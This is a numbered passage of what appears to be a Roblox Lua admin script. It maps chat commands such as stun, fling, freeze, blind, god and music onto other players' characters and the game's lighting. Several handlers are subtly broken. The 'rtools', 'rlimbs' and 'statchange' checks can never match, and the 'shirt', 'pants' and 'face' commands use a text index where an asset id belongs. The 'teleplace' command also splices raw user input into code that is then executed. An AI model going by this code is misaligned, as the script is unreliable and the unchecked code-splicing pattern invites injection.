  1257. if Cmd.Text:lower():sub(1,5) == "trip " then
  1258. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1259. for i, v in pairs(plrz) do
  1260. coroutine.resume(coroutine.create(function()
  1261. if v and v.Character and v.Character:findFirstChild("Torso") then
  1262. v.Character.Torso.CFrame = v.Character.Torso.CFrame * CFrame.Angles(0,0,math.rad(180))
  1263. end
  1264. end))
  1265. end
  1266. end
  1267.  
  1268. if Cmd.Text:lower():sub(1,5) == "stun " then
  1269. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1270. for i, v in pairs(plrz) do
  1271. coroutine.resume(coroutine.create(function()
  1272. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1273. v.Character.Humanoid.PlatformStand = true
  1274. end
  1275. end))
  1276. end
  1277. end
  1278.  
  1279. if Cmd.Text:lower():sub(1,7) == "unstun " then
  1280. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1281. for i, v in pairs(plrz) do
  1282. coroutine.resume(coroutine.create(function()
  1283. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1284. v.Character.Humanoid.PlatformStand = false
  1285. end
  1286. end))
  1287. end
  1288. end
  1289.  
  1290. if Cmd.Text:lower():sub(1,5) == "jump " then
  1291. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1292. for i, v in pairs(plrz) do
  1293. coroutine.resume(coroutine.create(function()
  1294. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1295. v.Character.Humanoid.Jump = true
  1296. end
  1297. end))
  1298. end
  1299. end
  1300.  
  1301. if Cmd.Text:lower():sub(1,4) == "sit " then
  1302. local plrz = GetPlr(plr, Cmd.Text:lower():sub(5))
  1303. for i, v in pairs(plrz) do
  1304. coroutine.resume(coroutine.create(function()
  1305. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1306. v.Character.Humanoid.Sit = true
  1307. end
  1308. end))
  1309. end
  1310. end
  1311.  
  1312. if Cmd.Text:lower():sub(1,10) == "invisible " then
  1313. local plrz = GetPlr(plr, Cmd.Text:lower():sub(11))
  1314. for i, v in pairs(plrz) do
  1315. coroutine.resume(coroutine.create(function()
  1316. if v and v.Character then
  1317. for a, obj in pairs(v.Character:children()) do
  1318. if obj:IsA("BasePart") then obj.Transparency = 1 if obj:findFirstChild("face") then obj.face.Transparency = 1 end elseif obj:IsA("Hat") and obj:findFirstChild("Handle") then obj.Handle.Transparency = 1 end
  1319. end
  1320. end
  1321. end))
  1322. end
  1323. end
  1324.  
  1325. if Cmd.Text:lower():sub(1,8) == "visible " then
  1326. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1327. for i, v in pairs(plrz) do
  1328. coroutine.resume(coroutine.create(function()
  1329. if v and v.Character then
  1330. for a, obj in pairs(v.Character:children()) do
  1331. if obj:IsA("BasePart") then obj.Transparency = 0 if obj:findFirstChild("face") then obj.face.Transparency = 0 end elseif obj:IsA("Hat") and obj:findFirstChild("Handle") then obj.Handle.Transparency = 0 end
  1332. end
  1333. end
  1334. end))
  1335. end
  1336. end
  1337.  
  1338.  
  1339.  
  1340. if Cmd.Text:lower():sub(1,5) == "fire " then
  1341. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1342. for i, v in pairs(plrz) do
  1343. coroutine.resume(coroutine.create(function()
  1344. if v and v.Character and v.Character:findFirstChild("Torso") then
  1345. local cl = Instance.new("Fire", v.Character.Torso)
  1346. end
  1347. end))
  1348. end
  1349. end
  1350.  
  1351. if Cmd.Text:lower():sub(1,7) == "unfire " then
  1352. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1353. for i, v in pairs(plrz) do
  1354. coroutine.resume(coroutine.create(function()
  1355. if v and v.Character and v.Character:findFirstChild("Torso") then
  1356. for z, cl in pairs(v.Character.Torso:children()) do if cl:IsA("Fire") then cl:Destroy() end end
  1357. end
  1358. end))
  1359. end
  1360. end
  1361.  
  1362. if Cmd.Text:lower():sub(1,6) == "smoke " then
  1363. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7))
  1364. for i, v in pairs(plrz) do
  1365. coroutine.resume(coroutine.create(function()
  1366. if v and v.Character and v.Character:findFirstChild("Torso") then
  1367. local cl = Instance.new("Smoke", v.Character.Torso)
  1368. end
  1369. end))
  1370. end
  1371. end
  1372.  
  1373. if Cmd.Text:lower():sub(1,8) == "unsmoke " then
  1374. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1375. for i, v in pairs(plrz) do
  1376. coroutine.resume(coroutine.create(function()
  1377. if v and v.Character and v.Character:findFirstChild("Torso") then
  1378. for z, cl in pairs(v.Character.Torso:children()) do if cl:IsA("Smoke") then cl:Destroy() end end
  1379. end
  1380. end))
  1381. end
  1382. end
  1383.  
  1384. if Cmd.Text:lower():sub(1,9) == "sparkles " then
  1385. local plrz = GetPlr(plr, Cmd.Text:lower():sub(10))
  1386. for i, v in pairs(plrz) do
  1387. coroutine.resume(coroutine.create(function()
  1388. if v and v.Character and v.Character:findFirstChild("Torso") then
  1389. local cl = Instance.new("Sparkles", v.Character.Torso)
  1390. end
  1391. end))
  1392. end
  1393. end
  1394.  
  1395. if Cmd.Text:lower():sub(1,11) == "unsparkles " then
  1396. local plrz = GetPlr(plr, Cmd.Text:lower():sub(12))
  1397. for i, v in pairs(plrz) do
  1398. coroutine.resume(coroutine.create(function()
  1399. if v and v.Character and v.Character:findFirstChild("Torso") then
  1400. for z, cl in pairs(v.Character.Torso:children()) do if cl:IsA("Sparkles") then cl:Destroy() end end
  1401. end
  1402. end))
  1403. end
  1404. end
  1405.  
  1406. if Cmd.Text:lower():sub(1,3) == "ff " then
  1407. local plrz = GetPlr(plr, Cmd.Text:lower():sub(4))
  1408. for i, v in pairs(plrz) do
  1409. coroutine.resume(coroutine.create(function()
  1410. if v and v.Character then Instance.new("ForceField", v.Character) end
  1411. end))
  1412. end
  1413. end
  1414.  
  1415. if Cmd.Text:lower():sub(1,5) == "unff " then
  1416. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1417. for i, v in pairs(plrz) do
  1418. coroutine.resume(coroutine.create(function()
  1419. if v and v.Character then
  1420. for z, cl in pairs(v.Character:children()) do if cl:IsA("ForceField") then cl:Destroy() end end
  1421. end
  1422. end))
  1423. end
  1424. end
  1425.  
  1426. if Cmd.Text:lower():sub(1,7) == "freeze " then
  1427. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1428. for i, v in pairs(plrz) do
  1429. coroutine.resume(coroutine.create(function()
  1430. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1431. for a, obj in pairs(v.Character:children()) do
  1432. if obj:IsA("BasePart") then obj.Anchored = true end v.Character.Humanoid.WalkSpeed = 0
  1433. end
  1434. end
  1435. end))
  1436. end
  1437. end
  1438.  
  1439. if Cmd.Text:lower():sub(1,5) == "thaw " then
  1440. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1441. for i, v in pairs(plrz) do
  1442. coroutine.resume(coroutine.create(function()
  1443. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1444. for a, obj in pairs(v.Character:children()) do
  1445. if obj:IsA("BasePart") then obj.Anchored = false end v.Character.Humanoid.WalkSpeed = 16
  1446. end
  1447. end
  1448. end))
  1449. end
  1450. end
  1451.  
  1452.  
  1453.  
  1454. if Cmd.Text:lower():sub(1,4) == "god " then
  1455. local plrz = GetPlr(plr, Cmd.Text:lower():sub(5))
  1456. for i, v in pairs(plrz) do
  1457. coroutine.resume(coroutine.create(function()
  1458. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1459. v.Character.Humanoid.MaxHealth = math.huge
  1460. v.Character.Humanoid.Health = 9e9
  1461. end
  1462. end))
  1463. end
  1464. end
  1465.  
  1466. if Cmd.Text:lower():sub(1,6) == "ungod " then
  1467. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7))
  1468. for i, v in pairs(plrz) do
  1469. coroutine.resume(coroutine.create(function()
  1470. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1471. v.Character.Humanoid.MaxHealth = 100
  1472. v.Character.Humanoid.Health = v.Character.Humanoid.MaxHealth
  1473. end
  1474. end))
  1475. end
  1476. end
  1477.  
  1478. if Cmd.Text:lower():sub(1,8) == "ambient " then
  1479. local chk1 = Cmd.Text:lower():sub(9):find(" ") + 8
  1480. local chk2 = Cmd.Text:sub(chk1+1):find(" ") + chk1
  1481. game.Lighting.Ambient = Color3.new(Cmd.Text:sub(9,chk1-1),Cmd.Text:sub(chk1+1,chk2-1),Cmd.Text:sub(chk2+1))
  1482. end
  1483.  
  1484. if Cmd.Text:lower():sub(1,11) == "brightness " then
  1485. game.Lighting.Brightness = Cmd.Text:sub(12)
  1486. end
  1487.  
  1488. if Cmd.Text:lower():sub(1,5) == "time " then
  1489. game.Lighting.TimeOfDay = Cmd.Text:sub(6)
  1490. end
  1491.  
  1492. if Cmd.Text:lower():sub(1,9) == "fogcolor " then
  1493. local chk1 = Cmd.Text:lower():sub(10):find(" ") + 9
  1494. local chk2 = Cmd.Text:sub(chk1+1):find(" ") + chk1
  1495. game.Lighting.FogColor = Color3.new(Cmd.Text:sub(10,chk1-1),Cmd.Text:sub(chk1+1,chk2-1),Cmd.Text:sub(chk2+1))
  1496. end
  1497.  
  1498. if Cmd.Text:lower():sub(1,7) == "fogend " then
  1499. game.Lighting.FogEnd = Cmd.Text:sub(8)
  1500. end
  1501.  
  1502. if Cmd.Text:lower():sub(1,9) == "fogstart " then
  1503. game.Lighting.FogStart = Cmd.Text:sub(10)
  1504. end
  1505.  
  1506.  
  1507.  
  1508. if Cmd.Text:lower():sub(1,12) == "rtools " then
  1509. local plrz = GetPlr(plr, Cmd.Text:lower():sub(13))
  1510. for i, v in pairs(plrz) do
  1511. coroutine.resume(coroutine.create(function()
  1512. if v and v.Character and v:findFirstChild("Backpack") then
  1513. for a, tool in pairs(v.Character:children()) do if tool:IsA("Tool") or tool:IsA("HopperBin") then tool:Destroy() end end
  1514. for a, tool in pairs(v.Backpack:children()) do if tool:IsA("Tool") or tool:IsA("HopperBin") then tool:Destroy() end end
  1515. end
  1516. end))
  1517. end
  1518. end
  1519.  
  1520.  
  1521.  
  1522.  
  1523.  
  1524.  
  1525.  
  1526. if Cmd.Text:lower():sub(1,8) == "shealth " then
  1527. local chk1 = Cmd.Text:lower():sub(9):find(" ") + 8
  1528. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9,chk1-1))
  1529. for i, v in pairs(plrz) do
  1530. coroutine.resume(coroutine.create(function()
  1531. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1532. v.Character.Humanoid.MaxHealth = Cmd.Text:sub(chk1+1)
  1533. v.Character.Humanoid.Health = v.Character.Humanoid.MaxHealth
  1534. end
  1535. end))
  1536. end
  1537. end
  1538.  
  1539. if Cmd.Text:lower():sub(1,6) == "speed " then
  1540. local chk1 = Cmd.Text:lower():sub(7):find(" ") + 6
  1541. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7,chk1-1))
  1542. for i, v in pairs(plrz) do
  1543. coroutine.resume(coroutine.create(function()
  1544. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1545. v.Character.Humanoid.WalkSpeed = Cmd.Text:sub(chk1+1)
  1546. end
  1547. end))
  1548. end
  1549. end
  1550.  
  1551.  
  1552. if Cmd.Text:lower():sub(1,10) == "teleplace " then
  1553. local chk1 = Cmd.Text:lower():sub(11):find(" ") + 10
  1554. local plrz = GetPlr(plr, Cmd.Text:lower():sub(11,chk1-1))
  1555. for i, v in pairs(plrz) do
  1556. coroutine.resume(coroutine.create(function()
  1557. if v and v:findFirstChild("PlayerGui") then
  1558. local cl = script.LocalScriptBase:Clone() cl.Code.Value = [[game:service("TeleportService"):Teleport(]] .. Cmd.Text:sub(chk1+1) .. ")" cl.Parent = v.PlayerGui cl.Disabled = false
  1559. end
  1560. end))
  1561. end
  1562. end
  1563.  
  1564. if Cmd.Text:lower():sub(1,3) == "tp " then
  1565. local chk1 = Cmd.Text:lower():sub(4):find(" ") + 3
  1566. local plrz = GetPlr(plr, Cmd.Text:lower():sub(4,chk1-1))
  1567. local plrz2 = GetPlr(plr, Cmd.Text:lower():sub(chk1+1))
  1568. for i, v in pairs(plrz) do
  1569. coroutine.resume(coroutine.create(function()
  1570. for i2, v2 in pairs(plrz2) do
  1571. if v and v2 and v.Character and v2.Character and v.Character:findFirstChild("Torso") and v2.Character:findFirstChild("Torso") then
  1572. v.Character.Torso.CFrame = v2.Character.Torso.CFrame + Vector3.new(math.random(-1,1),0,math.random(-1,1))
  1573. end
  1574. end
  1575. end))
  1576. end
  1577. end
  1578.  
  1579. if Cmd.Text:lower():sub(1,7) == "statchange " then
  1580. local chk1 = Cmd.Text:lower():sub(8):find(" ") + 7
  1581. local chk2 = Cmd.Text:sub(chk1+1):find(" ") + chk1
  1582. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8,chk1-1))
  1583. for i, v in pairs(plrz) do
  1584. coroutine.resume(coroutine.create(function()
  1585. if v and v:findFirstChild("leaderstats") then
  1586. for a, st in pairs(v.leaderstats:children()) do
  1587. if st.Name:lower():find(Cmd.Text:sub(chk1+1,chk2-1)) == 1 then st.Value = Cmd.Text:sub(chk2+1) end
  1588. end
  1589. end
  1590. end))
  1591. end
  1592. end
  1593.  
  1594. if Cmd.Text:lower():sub(1,6) == "shirt " then
  1595. local chk1 = Cmd.Text:lower():sub(7):find(" ") + 6
  1596. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7,chk1-1))
  1597. for i, v in pairs(plrz) do
  1598. coroutine.resume(coroutine.create(function()
  1599. if v and v.Character then
  1600. for i,v in pairs(v.Character:children()) do
  1601. if v:IsA("Shirt") then local cl = v:Clone() cl.Parent = v.Parent cl.ShirtTemplate = "http://www.roblox.com/asset/?id=" .. chk1 v:Destroy() end
  1602. end
  1603. end
  1604. end))
  1605. end
  1606. end
  1607.  
  1608. if Cmd.Text:lower():sub(1,6) == "pants " then
  1609. local chk1 = Cmd.Text:lower():sub(7):find(" ") + 6
  1610. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7,chk1-1))
  1611. for i, v in pairs(plrz) do
  1612. coroutine.resume(coroutine.create(function()
  1613. if v and v.Character then
  1614. for i,v in pairs(v.Character:children()) do
  1615. if v:IsA("Pants") then local cl = v:Clone() cl.Parent = v.Parent cl.PantsTemplate = "http://www.roblox.com/asset/?id=" .. chk1 v:Destroy() end
  1616. end
  1617. end
  1618. end))
  1619. end
  1620. end
  1621.  
  1622. if Cmd.Text:lower():sub(1,5) == "gear " then
  1623. local chk1 = Cmd.Text:lower():sub(6):find(" ") + 5
  1624. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6, chk1-1))
  1625. for i, v in pairs(plrz) do
  1626. if Cmd.Text:lower():sub(6) == "all" then return end
  1627. if Cmd.Text:lower():sub(6) == "others"then return end
  1628. if Cmd.Text:lower():sub(6) == "nonadmins" then return end
  1629. coroutine.resume(coroutine.create(function()
  1630. if v and v:findFirstChild("Backpack") then
  1631. local obj = game:service("InsertService"):LoadAsset(tonumber(Cmd.Text:sub(chk1+1)))
  1632. for a,g in pairs(obj:children()) do if g:IsA("Tool") or g:IsA("HopperBin") then g.Parent = v.Backpack end end
  1633. obj:Destroy()
  1634. end
  1635. end))
  1636. end
  1637. end
  1638.  
  1639. if Cmd.Text:lower():sub(1,5) == "face " then
  1640. local chk1 = Cmd.Text:lower():sub(6):find(" ") + 5
  1641. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6,chk1-1))
  1642. for i, v in pairs(plrz) do
  1643. coroutine.resume(coroutine.create(function()
  1644. if v and v.Character and v.Character:findFirstChild("Head") and v.Character.Head:findFirstChild("face") then
  1645. v.Character.Head:findFirstChild("face").Texture = "http://www.roblox.com/asset/?id=" .. chk1
  1646. end
  1647. end))
  1648. end
  1649. end
  1650.  
  1651.  
  1652.  
  1653.  
  1654.  
  1655.  
  1656. if Cmd.Text:lower():sub(1,6) == "music " then
  1657. for i, v in pairs(game.Workspace:children()) do if v:IsA("Sound") then v:Destroy() end end
  1658. local id = Cmd.Text:sub(7)
  1659. local pitch = 1
  1660. if tostring(id):lower():find("caramell") then id = 2303479 end
  1661. if tostring(id):find("epic") then id = 27697743 pitch = 2.5 end
  1662. if tostring(id):find("rick") then id = 2027611 end
  1663. if tostring(id):find("halo") then id = 1034065 end
  1664. if tostring(id):find("pokemon") then id = 1372261 end
  1665. if tostring(id):find("cursed") then id = 1372257 end
  1666. if tostring(id):find("extreme") then id = 11420933 end
  1667. if tostring(id):find("awaken") then id = 27697277 end
  1668. if tostring(id):find("alone") then id = 27697392 end
  1669. if tostring(id):find("mario") then id = 1280470 end
  1670. if tostring(id):find("choir") then id = 1372258 end
  1671. if tostring(id):find("chrono") then id = 1280463 end
  1672. if tostring(id):find("dotr") then id = 11420922 end
  1673. if tostring(id):find("entertain") then id = 27697267 end
  1674. if tostring(id):find("fantasy") then id = 1280473 end
  1675. if tostring(id):find("final") then id = 1280414 end
  1676. if tostring(id):find("emblem") then id = 1372259 end
  1677. if tostring(id):find("flight") then id = 27697719 end
  1678. if tostring(id):find("banjo") then id = 27697298 end
  1679. if tostring(id):find("gothic") then id = 27697743 end
  1680. if tostring(id):find("hiphop") then id = 27697735 end
  1681. if tostring(id):find("intro") then id = 27697707 end
  1682. if tostring(id):find("mule") then id = 1077604 end
  1683. if tostring(id):find("film") then id = 27697713 end
  1684. if tostring(id):find("nezz") then id = 8610025 end
  1685. if tostring(id):find("angel") then id = 1372260 end
  1686. if tostring(id):find("resist") then id = 27697234 end
  1687. if tostring(id):find("schala") then id = 5985787 end
  1688. if tostring(id):find("organ") then id = 11231513 end
  1689. if tostring(id):find("tunnel") then id = 9650822 end
  1690. if tostring(id):find("spanish") then id = 5982975 end
  1691. if tostring(id):find("venom") then id = 1372262 end
  1692. if tostring(id):find("wind") then id = 1015394 end
  1693. if tostring(id):find("guitar") then id = 5986151 end
  1694. if tostring(id):find("fox") then id = 130797915 end
  1695. if tostring(id):find("gangnam") then id = 130844430 end
  1696. if tostring(id):find("nyan") then id = 130786686 end
  1697. if tostring(id):find("harlem") then id = 131154740 end
  1698. local s = Instance.new("Sound", game.Workspace) s.SoundId = "http://www.roblox.com/asset/?id=" .. id s.Volume = 1 s.Pitch = pitch s.Looped = true s.archivable = false repeat s:Play() wait(2.5) s:Stop() wait(.5) s:Play() until s.IsPlaying
  1699. end
  1700.  
  1701. if Cmd.Text:lower() == "stopmusic" then
  1702. for i, v in pairs(game.Workspace:children()) do if v:IsA("Sound") then v:Destroy() end end
  1703. end
  1704.  
  1705. if Cmd.Text:lower() == "musiclist" then
  1706. if plr.PlayerGui:findFirstChild("MUSICGUI") then return end
  1707. local scr, cmf, ent, num = ScrollGui() scr.Name = "MUSICGUI" scr.Parent = plr.PlayerGui
  1708. local list = {"caramell","epic","rick","halo","pokemon","cursed","extreme","awaken","alone","mario","choir","chrono","dotr","entertain","Harlem","Nyan","Fox","Gangnam","fantasy","final","emblem","flight","banjo","gothic","hiphop","intro","mule","film","nezz","angel","resist","schala","organ","tunnel","spanish","venom","wind","guitar"}
  1709. for i, v in pairs(list) do local cl = ent:Clone() cl.Parent = cmf cl.Text = v cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end
  1710. end
  1711.  
  1712.  
  1713. if Cmd.Text:lower():sub(1,5) == "spin " then
  1714. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1715. for i, v in pairs(plrz) do
  1716. coroutine.resume(coroutine.create(function()
  1717. if v and v.Character and v.Character:findFirstChild("Torso") then
  1718. for i,v in pairs(v.Character.Torso:children()) do if v.Name == "SPINNER" then v:Destroy() end end
  1719. local torso = v.Character:findFirstChild("Torso")
  1720. local bg = Instance.new("BodyGyro", torso) bg.Name = "SPINNER" bg.maxTorque = Vector3.new(0,math.huge,0) bg.P = 11111 bg.cframe = torso.CFrame table.insert(objects,bg)
  1721. repeat wait(1/44) bg.cframe = bg.cframe * CFrame.Angles(0,math.rad(30),0)
  1722. until not bg or bg.Parent ~= torso
  1723. end
  1724. end))
  1725. end
  1726. end
  1727.  
  1728. if Cmd.Text:lower():sub(1,7) == "unspin " then
  1729. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1730. for i, v in pairs(plrz) do
  1731. coroutine.resume(coroutine.create(function()
  1732. if v and v.Character and v.Character:findFirstChild("Torso") then
  1733. for a,q in pairs(v.Character.Torso:children()) do if q.Name == "SPINNER" then q:Destroy() end end
  1734. end
  1735. end))
  1736. end
  1737. end
  1738.  
  1739.  
  1740.  
  1741. if Cmd.Text:lower():sub(1,8) == "bighead " then
  1742. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1743. for i, v in pairs(plrz) do
  1744. coroutine.resume(coroutine.create(function()
  1745. if v and v.Character then v.Character.Head.Mesh.Scale = Vector3.new(3,3,3) v.Character.Torso.Neck.C0 = CFrame.new(0,1.9,0) * CFrame.Angles(math.rad(90),math.rad(180),0) end
  1746. end))
  1747. end
  1748. end
  1749.  
  1750. if Cmd.Text:lower():sub(1,9) == "minihead " then
  1751. local plrz = GetPlr(plr, Cmd.Text:lower():sub(10))
  1752. for i, v in pairs(plrz) do
  1753. coroutine.resume(coroutine.create(function()
  1754. if v and v.Character then v.Character.Head.Mesh.Scale = Vector3.new(.75,.75,.75) v.Character.Torso.Neck.C0 = CFrame.new(0,.8,0) * CFrame.Angles(math.rad(90),math.rad(180),0) end
  1755. end))
  1756. end
  1757. end
  1758.  
  1759. if Cmd.Text:lower():sub(1,6) == "fling " then
  1760. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7))
  1761. for i, v in pairs(plrz) do
  1762. coroutine.resume(coroutine.create(function()
  1763. if v and v.Character and v.Character:findFirstChild("Torso") and v.Character:findFirstChild("Humanoid") then
  1764. local xran local zran
  1765. repeat xran = math.random(-9999,9999) until math.abs(xran) >= 5555
  1766. repeat zran = math.random(-9999,9999) until math.abs(zran) >= 5555
  1767. v.Character.Humanoid.Sit = true v.Character.Torso.Velocity = Vector3.new(0,0,0)
  1768. local frc = Instance.new("BodyForce", v.Character.Torso) frc.Name = "BFRC" frc.force = Vector3.new(xran*4,9999*5,zran*4) game:service("Debris"):AddItem(frc,.1)
  1769. end
  1770. end))
  1771. end
  1772. end
  1773.  
  1774. if Cmd.Text:lower():sub(1,8) == "seizure " then
  1775. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1776. for i, v in pairs(plrz) do
  1777. coroutine.resume(coroutine.create(function()
  1778. if v and v.Character then
  1779. v.Character.Torso.CFrame = v.Character.Torso.CFrame * CFrame.Angles(math.rad(90),0,0)
  1780. end
  1781. end))
  1782. end
  1783. end
  1784.  
  1785. if Cmd.Text:lower():sub(1,10) == "unseizure " then
  1786. local plrz = GetPlr(plr, Cmd.Text:lower():sub(11))
  1787. for i, v in pairs(plrz) do
  1788. coroutine.resume(coroutine.create(function()
  1789. if v and v.Character then
  1790. for i,v in pairs(v.Character:children()) do if v.Name == "SeizureBase" then v:Destroy() end end
  1791. wait(.1) v.Character.Humanoid.PlatformStand = false
  1792. end
  1793. end))
  1794. end
  1795. end
  1796.  
  1797. if Cmd.Text:lower():sub(1,12) == "rlimbs " then
  1798. local plrz = GetPlr(plr, Cmd.Text:lower():sub(13))
  1799. for i, v in pairs(plrz) do
  1800. coroutine.resume(coroutine.create(function()
  1801. if v and v.Character then
  1802. for a, obj in pairs(v.Character:children()) do
  1803. if obj:IsA("BasePart") and (obj.Name:find("Leg") or obj.Name:find("Arm")) then obj:Destroy() end
  1804. end
  1805. end
  1806. end))
  1807. end
  1808. end
  1809.  
  1810.  
  1811. if Cmd.Text:lower():sub(1,5) == "char " then
  1812. local chk1 = Cmd.Text:lower():sub(6):find(" ") + 5
  1813. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6,chk1-1))
  1814. for i, v in pairs(plrz) do
  1815. coroutine.resume(coroutine.create(function()
  1816. if v and v.Character then
  1817. v.CharacterAppearance = "http://www.roblox.com/asset/CharacterFetch.ashx?userId=" .. Cmd.Text:sub(chk1+1)
  1818. v:LoadCharacter()
  1819. end
  1820. end))
  1821. end
  1822. end
  1823.  
  1824. if Cmd.Text:lower():sub(1,7) == "unchar " then
  1825. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1826. for i, v in pairs(plrz) do
  1827. coroutine.resume(coroutine.create(function()
  1828. if v and v.Character then
  1829. v.CharacterAppearance = "http://www.roblox.com/asset/CharacterFetch.ashx?userId=" .. v.userId
  1830. v:LoadCharacter()
  1831. end
  1832. end))
  1833. end
  1834. end
  1835.  
  1836.  
  1837.  
  1838. if Cmd.Text:lower():sub(1,7) == "normal " then
  1839. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1840. for i, v in pairs(plrz) do
  1841. coroutine.resume(coroutine.create(function()
  1842. if v and v.Character and v.Character:findFirstChild("Torso") then
  1843. if v.Character:findFirstChild("Head") then v.Character.Head.Mesh.Scale = Vector3.new(1.25,1.25,1.25) end
  1844. if v.Character.Torso:findFirstChild("Shirt") then v.Character.Torso.Shirt.Parent = v.Character end
  1845. if v.Character.Torso:findFirstChild("Pants") then v.Character.Torso.Pants.Parent = v.Character end
  1846. v.Character.Torso.Transparency = 0
  1847. v.Character.Torso.Neck.C0 = CFrame.new(0,1,0) * CFrame.Angles(math.rad(90),math.rad(180),0)
  1848. v.Character.Torso["Right Shoulder"].C0 = CFrame.new(1,.5,0) * CFrame.Angles(0,math.rad(90),0)
  1849. v.Character.Torso["Left Shoulder"].C0 = CFrame.new(-1,.5,0) * CFrame.Angles(0,math.rad(-90),0)
  1850. v.Character.Torso["Right Hip"].C0 = CFrame.new(1,-1,0) * CFrame.Angles(0,math.rad(90),0)
  1851. v.Character.Torso["Left Hip"].C0 = CFrame.new(-1,-1,0) * CFrame.Angles(0,math.rad(-90),0)
  1852. for a, sc in pairs(v.Character:children()) do if sc.Name == "ify" then sc:Destroy() end end
  1853. for a, prt in pairs(v.Character:children()) do if prt:IsA("BasePart") and (prt.Name ~= "Head" or not prt.Parent:findFirstChild("NameTag", true)) then
  1854. prt.Transparency = 0 prt.Reflectance = 0 prt.BrickColor = BrickColor.new("White")
  1855. if prt.Name == "FAKETORSO" then prt:Destroy() end
  1856. elseif prt:findFirstChild("NameTag") then prt.Head.Transparency = 0 prt.Head.Reflectance = 0 prt.Head.BrickColor = BrickColor.new("White")
  1857. end end
  1858. end
  1859. end))
  1860. end
  1861. end
  1862.  
  1863. if Cmd.Text:lower():sub(1,7) == "trippy " then
  1864. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1865. for i, v in pairs(plrz) do
  1866. coroutine.resume(coroutine.create(function()
  1867. if v and v:findFirstChild("PlayerGui")then
  1868. for a, g in pairs(v.PlayerGui:children()) do if g.Name:sub(1,9) == "EFFECTGUI" then g:Destroy() end end
  1869. local scr = Instance.new("ScreenGui", v.PlayerGui) scr.Name = "EFFECTGUITRIPPY"
  1870. local bg = Instance.new("Frame", scr) bg.BackgroundColor3 = Color3.new(0,0,0) bg.BackgroundTransparency = 0 bg.Size = UDim2.new(10,0,10,0) bg.Position = UDim2.new(-5,0,-5,0) bg.ZIndex = 10
  1871. local cl = script.ScriptBase:Clone() cl.Code.Value = [[repeat wait(1/44) script.Parent.Frame.BackgroundColor3 = Color3.new(math.random(255)/255,math.random(255)/255,math.random(255)/255) until nil]] cl.Parent = scr cl.Disabled = false
  1872. end
  1873. end))
  1874. end
  1875. end
  1876.  
  1877. if Cmd.Text:lower():sub(1,9) == "untrippy " then
  1878. local plrz = GetPlr(plr, Cmd.Text:lower():sub(10))
  1879. for i, v in pairs(plrz) do
  1880. coroutine.resume(coroutine.create(function()
  1881. if v and v:findFirstChild("PlayerGui") then
  1882. for a, g in pairs(v.PlayerGui:children()) do if g.Name == "EFFECTGUITRIPPY" then g:Destroy() end end
  1883. end
  1884. end))
  1885. end
  1886. end
  1887.  
  1888.  
  1889. if Cmd.Text:lower():sub(1,6) == "blind " then
  1890. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7))
  1891. for i, v in pairs(plrz) do
  1892. coroutine.resume(coroutine.create(function()
  1893. if v and v:findFirstChild("PlayerGui") then
  1894. for a, g in pairs(v.PlayerGui:children()) do if g.Name:sub(1,9) == "EFFECTGUI" then g:Destroy() end end
  1895. local scr = Instance.new("ScreenGui", v.PlayerGui) scr.Name = "EFFECTGUIBLIND"
  1896. local bg = Instance.new("Frame", scr) bg.BackgroundColor3 = Color3.new(0,0,0) bg.BackgroundTransparency = 0 bg.Size = UDim2.new(10,0,10,0) bg.Position = UDim2.new(-5,0,-5,0) bg.ZIndex = 10
  1897. end
  1898. end))
  1899. end
  1900. end
  1901.  
  1902. if Cmd.Text:lower():sub(1,8) == "unblind " then
  1903. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1904. for i, v in pairs(plrz) do
  1905. coroutine.resume(coroutine.create(function()
  1906. if v and v:findFirstChild("PlayerGui") then
  1907. for a, g in pairs(v.PlayerGui:children()) do if g.Name == "EFFECTGUIBLIND" then g:Destroy() end end
  1908. end
  1909. end))
  1910. end
  1911. end
  1912.  
  1913. if Cmd.Text:lower():sub(1,7) == "guifix " then
  1914. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1915. for i, v in pairs(plrz) do
  1916. coroutine.resume(coroutine.create(function()
  1917. if v and v:findFirstChild("PlayerGui") then
  1918. for a, g in pairs(v.PlayerGui:children()) do if g.Name:sub(1,9) == "EFFECTGUI" then g:Destroy() end end
  1919. end
  1920. end))
  1921. end
  1922. end
  1923.  
